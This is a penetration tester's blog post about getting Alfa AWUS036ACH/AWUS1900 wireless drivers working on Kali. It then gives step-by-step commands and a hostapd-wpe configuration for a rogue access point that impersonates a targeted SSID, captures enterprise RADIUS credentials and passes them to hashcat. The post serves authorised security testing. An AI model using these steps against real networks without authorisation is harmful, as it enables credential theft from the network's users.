10-10-2019 - Updated Wireless RADIUS MiTM on AWUS036ACH Kali2019.3


Edit: No longer relevant, just apt-get install realtek-rtl88xxau-dkms on an updated kali instance now.

Edit2: Just found out this is still required for Debian 8.

Edit3: The kali drivers are SHIT, use this method anyways.

Edit4: these things are a fickle bitch, updated 10-10-2019 for changes with the AWUS1900.

I just recently got back from a large wireless gig and found that it was time to update my wireless arsenal. I had previously been using an AWUS036NH, AWUS051NH and a AWSUS052NH. The 052 must have gotten damaged because its signal strength barely picks up my home wireless, and the other two cards have seen better days.

Wireless drivers are super finicky, what works today on a specific kernel release may not work after tomorrows apt update && apt upgrade -y. That's why this post is titled with the specific card, and Linux version used... your experience may vary.

So first I had to decide which card I wanted, looking over at Alfa's (https://www.alfa.com.tw/products_list.php?pc=137) website for their current generation cards I ended up choosing the AWUS036ACH(https://www.amazon.com/Long-Range-Dual-Band-Wireless-External-Antennas/dp/B00VEEBOPG/). It was a big decision between that card and the scary looking AWUS1900, and in hind sight with this driver install process the AWUS1900 should work just fine with some additional flags set.

Alright, so with my decision made I check out and start looking at driver install processes. It seemed pretty basic, make sure you have your system up to date, kernel headers, dkms installed, purge old 8812au drivers etc. etc. Much to my surprise then I finally get my card, try to start it up and I have no wlan interface.

I was frustrated a bit, I tried several different driver combinations, none of them seemed to work. Kali had updated documentation to say they had supported the 8812AU chipset, however that was in Kali 2017.1 release and the kernel changes since then broke the known good driver. I hunted around and eventually stumbled upon a more recent forum discussion talking about a new driver. (https://forums.kali.org/showthread.php?36814-How-to-install-AWUS036ACH-Drivers-and-getting-it-running/page3&s=9c5700ae3cb3103ca994e4245f65d74f)

So I gave it a shot, using a combination of everything I had learned up till that point with these drivers:

--------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------
Initial Setup:
apt update && apt upgrade -y
apt remove realtek-rtl88xxau-dkms && apt purge realtek-rtl88xxau-dkms -y
apt autoremove -y && apt autoclean -y
shutdown now

Hardware Change:
Enable USB3 on VMWare Interface (Default is USB2)
(Note: I also ordered a Micro B to USB Type C cable so I don't have to use dongles to connect the card to my Mac - https://www.amazon.com/dp/B076DLT9RW/)

Requirements:
sudo apt install dkms -y
sudo apt-get install build-essential -y
sudo apt-get install bc -y
sudo apt-get install linux-headers-`uname -r` -y
git clone https://github.com/aircrack-ng/rtl8812au
cd rtl8812au

Compile if using AWUS036ACH:
make && make install
modprobe 8812au

Compile if using AWUS1900:
make RTL8814=1
make install RTL8814=1
modeprobe mac80211

Kill Known Bad Interface Processes:
airmon-ng check kill

Enter Monitor Mode:
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
macchanger -r wlan0
sudo ip link set wlan0 up

or create a shell script for haxtime:
#!/bin/sh

sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
macchanger -r wlan0
airmon-ng check kill
sudo ip link set wlan0 up


And much to my surprise, a aireplay test:
aireplay -9 -a <my ap bssid> wlan0 resulted in a perfect 30/30 score. (edit: my AWUS1900 reported 0/30 but still captured handshakes and did hostapd-wpe --\_( )_/--)
--------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------

My next step was to install hostapd-wpe, one of my go to Enterprise RADIUS MiTM attack techniques. I was happy to see that Kali is now including this in the repos, making for an easy install instead of needing to patch hostapd yourself.

--------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------
apt-get install hostapd-wpe

To configure hostapd-wpe, modify the configuration file:

nano /etc/hostapd-wpe/hostapd-wpe.conf

so that:

ssid=<Targeted SSID>
channel=1
<insert new line under channel>
ieee80211n=1
<scroll down quite a bit and change>
hw_mode=g

With this configured, you can now launch hostapd-wpe:

./hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
--------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------

And with any luck, you can start capturing credentials, often times domain credentials. My go to tactic at this point is to attempt to crack the passwords in hashcat. For this, you will need to convert the credentials from john the ripper format to hashcat. (https://github.com/ins1gn1a/NetNTLM-Hashcat)

Comments

Post a Comment

Popular posts from this blog

Not Your Typical Pentest – IAM Cloud Insecurity

Image
Update: A co-worker brought up this story which shows exactly how bad things can get by abusing IAM roles.  https://threatpost.com/hacker-puts-hosting-service-code-spaces-out-of-business/106761/ As a penetration tester, I often have to adapt and change according to the technologies that I am testing. However, sometimes the technology I am testing may be new to me and I have to perform research to truly understand the technology so that I can do a thorough job. Too often you will find that your penetration testers can get into a mode of scan and report. They will fire up the vulnerability scanner, identify some stuff for the client to fix, and move on. This often happens because testers can get complacent with what they are seeing in the industry. Then when they land a remote shell on a system, they are repeating what they did last time because, “Hey it worked last time”. What really makes a good penetration tester is one who not only looks at the technology being tested throu
Read more

New AWS G3 Instance Lineup

Image
Amazon has released their new G3 instances. Utilizing a Tesla M60 GPU platform ( http://www.nvidia.com/object/tesla-m60.html ) and scaling up to 4 GPU's. Along with this you also get 64 CPU's and almost half a TB of RAM. I figured it was time to crunch some numbers on Hashcat performance of the current AWS cloud options. For all the new G3 M60 GPU benchmarks, please visit ( https://gist.github.com/binary1985/881c2df6310659413102eaf5e349e999 ) Current state of GPU Hash Cracking I have been following GPU performance trends since it first became popular with bitcoin. A recent trend in the cloud has me optimistic that "some" day high intensity GPU work loads will make fiscal sense to run cloud based. The last time I checked the current state of AWS GPU Hashcat performance I was disappointed in the findings however since then 2 new lines of GPU instances have come into play. Lets take a look at the current top tier options, using on demand pricing structures. G
Read more